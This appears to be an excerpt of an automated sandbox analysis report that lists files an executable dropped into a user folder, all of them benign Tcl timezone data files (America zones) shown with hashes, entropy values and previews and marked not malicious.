                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Asuncion) {.. {-9223372036854775808 -13840 0 LMT}.. {-2524507760 -13840 0 AMT}.. {-1206389360 -14400 0 -04}.. {86760000 -10800 0 -03}.. {134017200 -14400 0 -04}.. {162878400 -14400 0 -04}.. {181368000 -10800 1 -04}.. {194497200 -14400 0 -04}.. {212990400 -10800 1 -04}.. {226033200 -14400 0 -04}.. {244526400 -10800 1 -04}.. {257569200 -14400 0 -04}.. {276062400 -10800 1 -04}.. {291783600 -14400 0 -04}.. {307598400 -10800 1 -04}.. {323406000 -14400 0 -04}.. {339220800 -10800 1 -04}.. {354942000 -14400 0 -04}.. {370756800 -10800 1 -04}.. {386478000 -14400 0 -04}.. {402292800 -10800 1 -04}.. {418014000 -14400 0 -04}.. {433828800 -10800 1 -04}.. {449636400 -14400 0 -04}.. {465451200 -10800 1 -04}.. {481172400 -14400 0 -04}.. {496987200 -10800 1 -04}.. {512708400 -14400 0 -04}.. {528523200 -10800 1 -04}.. {544244400 -14400 0 -04}.. {5
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.791603790249234
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE/qlOi+4IAcGEu5B:SlSWB9vsM3y7oDSHAIgpdN/290/qlf+M
                                                                                                                                                                                                                              MD5:5A45B70C79F533548B3DD332F988E15B
                                                                                                                                                                                                                              SHA1:C7485828619A1D4F5CA59D80ABD197100AC58F64
                                                                                                                                                                                                                              SHA-256:518BEB6E54AE811F8C725EA8CC42787D48FC605A3476D6E7A00A1B5733CBD6AC
                                                                                                                                                                                                                              SHA-512:A81C2EBE282E019ED011EADDB8F74C3E6FBE88D87E8D8706B3022CDCC48EF92AD90F9BCF9F25031664BB6EFE069EAFDD23D9B55BF672FC7528A2DD8CB6B986B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Atikokan) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):177
                                                                                                                                                                                                                              Entropy (8bit):4.812527147763069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/2IAcGE/ol7x+IAcGs:SlSWB9vsM3y7/yrHAIgp/yH0AN/290/e
                                                                                                                                                                                                                              MD5:13479F64BFBDC7583C637E1562C454B4
                                                                                                                                                                                                                              SHA1:2F59484C779B0D6033FC14E205DA9BCAB7A5FCB1
                                                                                                                                                                                                                              SHA-256:1D6FEE336E71FFFB64874A830C976867C071EBF6B133C296B32F87E3E7D814C9
                                                                                                                                                                                                                              SHA-512:D2C5D35BBBDAB8D58BF6185328124796C06B67ADFB4C1828BA5A9CCA500A01BB8BE69635AE7EEA7FA837A27B20D488A08A29B121DD1617BC373390AD95D67E39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:America/Atka) $TZData(:America/Adak)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2012
                                                                                                                                                                                                                              Entropy (8bit):3.703391569010329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5/ChlvEw6kSSx5H4a8tf3fku+da2XUd23t8VZDG8+GyOd:VIlvEwJSSxdF8tfMu+da2kdCt8VZy8+K
                                                                                                                                                                                                                              MD5:69DCC2477D8D81E2F49D295DB6907190
                                                                                                                                                                                                                              SHA1:3C6ED0CEF15D3265C962873480EE1809A4DCACA2
                                                                                                                                                                                                                              SHA-256:64F1EC14F6B43FF10B564F839152E88DF9262F0947D1DB347557FA902F6FD48C
                                                                                                                                                                                                                              SHA-512:71DEA6D47F267AA7326A011872FA74762FA4F8CD57EB149E3B56B3DE9097B0B9258BC4F6C29188B49FC60C1942869B92D9E59FEE6980A5DA5D0029C383D99F39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia) {.. {-9223372036854775808 -9244 0 LMT}.. {-1767216356 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2073
                                                                                                                                                                                                                              Entropy (8bit):4.021485901155292
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:56hey9WUQwuz/V/NF01Y3A6S++S+vS+QQS+1S+9fS+BrS+HoS+8S+/N5S+5zNZf+:5pUIdFS1Y3FUlWQnH7eelN5Lh9LY5Lj
                                                                                                                                                                                                                              MD5:4655AE5AB9C39CA05C1FF36FC366679F
                                                                                                                                                                                                                              SHA1:F3F1D08EC35907A8F45AA2CFD097F6DCCA75C9B8
                                                                                                                                                                                                                              SHA-256:A6233E5BB0D3B30D0E3B94CD797718041AC3C2E75B387D6646A5C0376C5591CD
                                                                                                                                                                                                                              SHA-512:3915B845A312147C5B047096033B3D153E4E83AF4C8E4AAA73C8D12E2A8386CFE8EC4568730F9F28863017A60622DD9CC7D97991C966779B4068BC29F6C6B2B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia_Banderas) {.. {-9223372036854775808 -25260 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):648
                                                                                                                                                                                                                              Entropy (8bit):4.251560000277241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290eWmdH9Colj/uFkv/lC1/uFkOzQs/lps/Ozfah/OzT/lN/uFkX/ll/uFki:5TWeUo5Skv/Y1SkA/g/Bh/m/rSkX/zSt
                                                                                                                                                                                                                              MD5:DC4FA44B2174A4E6F0644FA8EA2E83F9
                                                                                                                                                                                                                              SHA1:C12DF8C862A05D569EAF189272F8BF44303595A1
                                                                                                                                                                                                                              SHA-256:FD5E04136506C6543A9ACDC890A30BCF0D561148E1063EC857E3913DE1EBA404
                                                                                                                                                                                                                              SHA-512:5AC307CD48132B57215CCBAF0BB63F7FA9C5B28DC9F6217C905885D75B0DF131238D4DB2AE707C3DDEE2EDE6C0914644B435FB1CDD9913600D8B69AE95578B0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Barbados) {.. {-9223372036854775808 -14309 0 LMT}.. {-1841256091 -14400 0 AST}.. {-874263600 -10800 1 ADT}.. {-862682400 -14400 0 AST}.. {-841604400 -10800 1 ADT}.. {-830714400 -14400 0 AST}.. {-820526400 -14400 0 -0330}.. {-811882800 -12600 1 AST}.. {-798660000 -14400 0 -0330}.. {-788904000 -14400 0 AST}.. {234943200 -10800 1 ADT}.. {244616400 -14400 0 AST}.. {261554400 -10800 1 ADT}.. {276066000 -14400 0 AST}.. {293004000 -10800 1 ADT}.. {307515600 -14400 0 AST}.. {325058400 -10800 1 ADT}.. {338706000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                              Entropy (8bit):3.8842563546204225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5fe300cChlrLPsw6kSS3h5R14eH8tf3xd:5+CChlvEw6kSSx5H4a8tf3xd
                                                                                                                                                                                                                              MD5:DFA5E50F6AEF1311A4CF74970477E390
                                                                                                                                                                                                                              SHA1:5B63676EB8039B2BE767BAA44820F2DAE5B62876
                                                                                                                                                                                                                              SHA-256:549625CCB30BD0E025BAC47668BA3AA0CDD8569E5887E483C8D62B5B7302FA50
                                                                                                                                                                                                                              SHA-512:4BBB43694E3B54339C549AC3A5488B77366DB1189D8D1834DCF618D9448084A950B575E207064521B1CDFD2E41F7D1D8C5CD9CEB4668D4459585649556136EB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belem) {.. {-9223372036854775808 -11636 0 LMT}.. {-1767213964 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3284
                                                                                                                                                                                                                              Entropy (8bit):3.8546064195941097
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5pKSxZwR9IVQU55DG5krgGN8wW+YeD1yyfCwoc:HKSjgIVzrG5krRN8wWheD1yu
                                                                                                                                                                                                                              MD5:4DA622B685B3B075CC94FC4E23322547
                                                                                                                                                                                                                              SHA1:DEB23F0A434549DAE1BE60ACF757BB212C907B92
                                                                                                                                                                                                                              SHA-256:E07F45264E28FD5AA54BD48CB701658509829CF989EC9BD79498D070A1BA270F
                                                                                                                                                                                                                              SHA-512:9B00BF8870BC4AAEF7F06FCDFEEEF54686A2CC890103696631EB4DEF5AEEAD051EC9069D70A2B22397F18C0067E03A54E75DA18474D6B1BD3BDA2D5313E0AD16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belize) {.. {-9223372036854775808 -21168 0 LMT}.. {-1822500432 -21600 0 CST}.. {-1616954400 -19800 1 -0530}.. {-1606069800 -21600 0 CST}.. {-1585504800 -19800 1 -0530}.. {-1574015400 -21600 0 CST}.. {-1554055200 -19800 1 -0530}.. {-1542565800 -21600 0 CST}.. {-1522605600 -19800 1 -0530}.. {-1511116200 -21600 0 CST}.. {-1490551200 -19800 1 -0530}.. {-1479666600 -21600 0 CST}.. {-1459101600 -19800 1 -0530}.. {-1448217000 -21600 0 CST}.. {-1427652000 -19800 1 -0530}.. {-1416162600 -21600 0 CST}.. {-1396202400 -19800 1 -0530}.. {-1384713000 -21600 0 CST}.. {-1364752800 -19800 1 -0530}.. {-1353263400 -21600 0 CST}.. {-1333303200 -19800 1 -0530}.. {-1321813800 -21600 0 CST}.. {-1301248800 -19800 1 -0530}.. {-1290364200 -21600 0 CST}.. {-1269799200 -19800 1 -0530}.. {-1258914600 -21600 0 CST}.. {-1238349600 -19800 1 -0530}.. {-1226860200 -21600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                              Entropy (8bit):4.938043196147077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290F490ppv:MByMYbpwt290S90b
                                                                                                                                                                                                                              MD5:09FD8280CC890F238126F9641DB7C90E
                                                                                                                                                                                                                              SHA1:98AB4E0DE8173C2BB2532B07FAE2E71F588AB26F
                                                                                                                                                                                                                              SHA-256:FACD0A835D1F425CD323EE453ADE231810B2D1CF6EBA227BA1B50522AE3879F7
                                                                                                                                                                                                                              SHA-512:117C24389B7BFB079F4409B1FA6AA547654D7C69A6CBB19218BF2B96F6CFE3CBAAD400D4C2EFE8A9BFE25F44402057427FC8A62DC20A98018D23A7CF9B87401F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Blanc-Sablon) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1199
                                                                                                                                                                                                                              Entropy (8bit):3.7988385604912893
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5EThevwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQZ:5EHSeSFESoSQSrSsCSeSPS1cSQSQlSsp
                                                                                                                                                                                                                              MD5:9529221F9B4E104CC598491703B10E6C
                                                                                                                                                                                                                              SHA1:5ACD61B525A18DE1919A7484C92EC5D787DF2F25
                                                                                                                                                                                                                              SHA-256:10592EA1CB0D02C06A61059EC601F70A706A5053AC923B9EED29388D5E71EF3A
                                                                                                                                                                                                                              SHA-512:66BEDB631469651A5E426155428764E3C1C14483E6FEE1505812E8676EB6E82CF0A88F6CC697F03FDA0AF906D91C7DE6E940DF3D33DD247BEF51DBD9A13DEE16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boa_Vista) {.. {-9223372036854775808 -14560 0 LMT}.. {-1767211040 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.705337479465446
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290bJhDm2OHDgoHvcuknov/zEXPKV2kR/uFVEV/KVg:MB86290bLmdHDgCvcukCz8O2Y/uF2/Og
                                                                                                                                                                                                                              MD5:DB019451A7D678C3E7AEE706283861F6
                                                                                                                                                                                                                              SHA1:57E63C5372F50CBD1A7FA32688C1B77ADDCC06EB
                                                                                                                                                                                                                              SHA-256:B6ADC16815DC95E537548CA3572D7F93626A6D1DC390DD4CBABAB5AB855BBA30
                                                                                                                                                                                                                              SHA-512:6C94B2D7EFA856E6BD41FC45B0E8D16A40E61D8B895397CD71230047FAD4793DDB9ABAAC57D2841549F161C9389D7E61D54D38F1BAC6F13ED3DD4C68CDD3272C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bogota) {.. {-9223372036854775808 -17776 0 LMT}.. {-2707671824 -17776 0 BMT}.. {-1739041424 -18000 0 -05}.. {704869200 -14400 1 -05}.. {733896000 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8605
                                                                                                                                                                                                                              Entropy (8bit):3.8563913604109064
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eSwtktXNmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/jXNDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:005D0BF1320030A7E9CDC97D0C8BB44B
                                                                                                                                                                                                                              SHA1:CB236DA840A49B4BCD261114DCA38DADA567B091
                                                                                                                                                                                                                              SHA-256:93AF910CB2AD2203B71C1AD49D56DF4A4A14D07F885AFD4E755271F1372A517C
                                                                                                                                                                                                                              SHA-512:16A5483392741673BEC020EF6EBE963AB0FB12629D662C586C27A1E9A1BE3FEA8DC3D05A0E84917B8166E48CADA45C74DFABFDC897A6BC94D3C5058D31AD5126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boise) {.. {-9223372036854775808 -27889 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-1471788000 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126255600 -25200 0 MST}.. {129114000 -21600 0 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):239
                                                                                                                                                                                                                              Entropy (8bit):4.821972751564724
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MQA+zAHAIgp/MQA+zE5N/290BFzk5h490/MQA+zd:MByMY/MV+zhp/MV+zE5t290rzy490/MW
                                                                                                                                                                                                                              MD5:6700956D5FE96CEC8D34EB49FF805374
                                                                                                                                                                                                                              SHA1:69B9973EF31AE204EFED7485E59CEA99E00815C8
                                                                                                                                                                                                                              SHA-256:DEFC5C9DA2D4D4146145A50D692A6BFF698C3B0A1F19EFD82AD0EE7678F39FCF
                                                                                                                                                                                                                              SHA-512:A80C03A519F00A4270248E885463090A34B3992B3DEBA94DD6AEBCC50736541655461E4AA10856125B8EF9B92CEB697429EE7088DBC6AB4FAE383FDF11521B7A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Buenos_Aires)]} {.. LoadTimeZoneFile America/Argentina/Buenos_Aires..}..set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7739
                                                                                                                                                                                                                              Entropy (8bit):3.8713679494465016
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:zsGaLV9T1sF7Lv/PCewtA8CzSPyDLbrcUia:h5lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:E6AE12CDB55FED492C253E46E2690FE0
                                                                                                                                                                                                                              SHA1:CD3699E50BC1694827E51E4101C713E52FA646C8
                                                                                                                                                                                                                              SHA-256:3E0506A54B562DBC3AA6889DDD39B327FE0B85C63B00F0B39D606921A0936A59
                                                                                                                                                                                                                              SHA-512:BA3D5D5420210E74E74A581C9678224948266828A8FACE06383E41E13475C682F82D288426FB915D618FFE7ED95BD8F1C7E9D59D31CE5B464D5EC1363AB5E340
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cambridge_Bay) {.. {-9223372036854775808 0 0 -00}.. {-1577923200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2918
                                                                                                                                                                                                                              Entropy (8bit):3.6039149423727013
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:591PSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxSs:5VsE3LMuJALTvn1ZdP7ZbvLfeAh+KIic
                                                                                                                                                                                                                              MD5:230A9F7A87BA56C30ACB3B1732F823F3
                                                                                                                                                                                                                              SHA1:8263EA723F2AEA7740C7EC54BE0000A06982D765
                                                                                                                                                                                                                              SHA-256:6D5BD1355016B03EDEA58DF98BEC26281CD372725B2DCB60B4D748D2FB4346C8
                                                                                                                                                                                                                              SHA-512:C357AA33833DBBDC6BC7DD3F23469EADDF08564AF17D7EE935C8AEA5F35B6E3BBDE1E181BC0DBF264051C4BE139261055633D191413DD610B0150AB3CDE161AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Campo_Grande) {.. {-9223372036854775808 -13108 0 LMT}.. {-1767212492 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                              Entropy (8bit):4.034087321254386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5s5edTS/uVV3iVP/uaP/uAyAhbS+V8S+FfS+UvS+MS+FB3S+QS+rcS+kS+RS+dSB:5DziZAmELf0On9uhcinzPPoUlWQW3
                                                                                                                                                                                                                              MD5:7FBCA91F4B7100C4667F24A9AB263109
                                                                                                                                                                                                                              SHA1:163A77FF9EAC49B00B5F838DF4D47F079ECF6A83
                                                                                                                                                                                                                              SHA-256:FD6C370F82E5CFE374637E0E222E72570857AC3F85143BEEEF9C3D0E7A6C0D04
